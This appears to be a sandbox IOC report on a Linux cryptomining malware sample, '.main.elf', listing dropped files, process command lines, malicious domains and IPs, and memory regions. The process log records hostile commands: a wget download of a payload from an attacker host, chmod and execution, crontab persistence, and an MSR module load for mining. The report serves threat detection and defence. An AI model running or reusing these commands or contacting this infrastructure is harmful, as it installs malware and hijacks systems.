IOC Report
.main.elf


Files

File Path | Type | Category | Malicious
--- | --- | --- | ---
.main.elf | ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped | initial sample | malicious
/var/spool/cron/crontabs/tmp.XlZKKM | ASCII text | dropped | malicious
/var/tmp/.rcu_gp/.ps5 | ASCII text | dropped | malicious
/var/tmp/.rcu_gp/.report_system | ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, missing section headers at 8825120 | dropped | malicious
/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages | ASCII text, with no line terminators | dropped |
/tmp/sh-thd.Mh6q2b | Bourne-Again shell script, ASCII text executable | dropped |
/var/tmp/.rcu_gp/.ps4 | ASCII text | dropped |
/var/tmp/.rcu_gp/diicot | Bourne-Again shell script, ASCII text executable | dropped |

Processes

A "-" in the Cmdline column means no command line was recorded for that process.

Path | Cmdline | Malicious
--- | --- | ---
/tmp/.main.elf | /tmp/.main.elf |
/bin/bash | /tmp/.main.elf -c "exec '/tmp/.main.elf' \"$@\"" /tmp/.main.elf |
/tmp/.main.elf | /tmp/.main.elf |
/bin/bash | /tmp/.main.elf -c " " /tmp/.main.elf |
/bin/bash | - |
/usr/bin/mkdir | mkdir /var/tmp/.rcu_gp |
/bin/bash | - |
/usr/bin/wget | wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system |
/bin/bash | - |
/usr/bin/chmod | chmod +x .report_system |
/bin/bash | - |
/usr/bin/cat | cat |
/bin/bash | - |
/usr/bin/chmod | chmod +x /var/tmp/.rcu_gp/diicot |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/rm | rm -rf /var/tmp/.rcu_gp/.ps5 |
/bin/bash | - |
/usr/bin/sleep | sleep 1 |
/bin/bash | - |
/usr/bin/sleep | sleep 1 |
/bin/bash | - |
/usr/bin/sleep | sleep 1 |
/bin/bash | - |
/usr/bin/crontab | crontab /var/tmp/.rcu_gp/.ps5 |
/bin/bash | - |
/usr/bin/sleep | sleep 1 |
/bin/bash | - |
/usr/bin/rm | rm -rf /var/tmp/.rcu_gp/.ps5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/var/tmp/.rcu_gp/diicot | - |
/var/tmp/.rcu_gp/./.report_system | /var/tmp/.rcu_gp/./.report_system |
/var/tmp/.rcu_gp/./.report_system | - |
/var/tmp/.rcu_gp/./.report_system | - |
/bin/sh | sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1" |
/bin/sh | - |
/sbin/modprobe | /sbin/modprobe msr allow_writes=on |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |
/bin/bash | - |
/usr/bin/cat | cat /var/tmp/.rcu_gp/.ps4 |
/bin/bash | - |
/var/tmp/.rcu_gp/diicot | /var/tmp/.rcu_gp/diicot |
/var/tmp/.rcu_gp/diicot | - |
/usr/bin/pgrep | pgrep -x .report_system |
/bin/bash | - |
/usr/bin/crontab | crontab -l |
/bin/bash | - |
/usr/bin/grep | grep -q .main |
/bin/bash | - |
/usr/bin/sleep | sleep 2.5 |

125 further processes are not shown in this report view.

URLs

Name | IP | Malicious
--- | --- | ---
https://xmrig.com/benchmark/%s | unknown |
https://bugs.launchpad.net/ubuntu/ | unknown |
https://xmrig.com/wizard | unknown |
http://xkobeimparatu.net/.puscarie/.report_system | 154.213.192.3 |
https://gcc.gnu.org/bugsterminate | unknown |
https://xmrig.com/wizard%s | unknown |
https://xmrig.com/docs/algorithms | unknown |

Domains

Name | IP | Malicious
--- | --- | ---
xkobeproxy.xkobeimparatu.net | 91.184.240.129 | malicious
xkobeimparatu.net | 154.213.192.3 |

IPs

IP | Domain | Country | Malicious
--- | --- | --- | ---
91.184.240.129 | xkobeproxy.xkobeimparatu.net | Russian Federation | malicious
154.213.192.3 | xkobeimparatu.net | Seychelles |
109.202.202.202 | unknown | Switzerland |
91.189.91.43 | unknown | United Kingdom |
91.189.91.42 | unknown | United Kingdom |

Memdumps

The Region type column was empty for every entry in the report; it is kept for completeness.

Base Address | Region type | Protect | Malicious
--- | --- | --- | ---
c29000 | | page execute read | malicious
e6b000 | | page read and write |
7fbde6528000 | | page read and write |
7fbde68e4000 | | page read and write |
f07000 | | page read and write |
7fbde6526000 | | page execute read |
7fbde671a000 | | page read and write |
2814000 | | page read and write |
7fbde689f000 | | page read and write |
7ffdf35f6000 | | page execute read |
7ffdf35d6000 | | page read and write |

1 further memdump is not shown in this report view.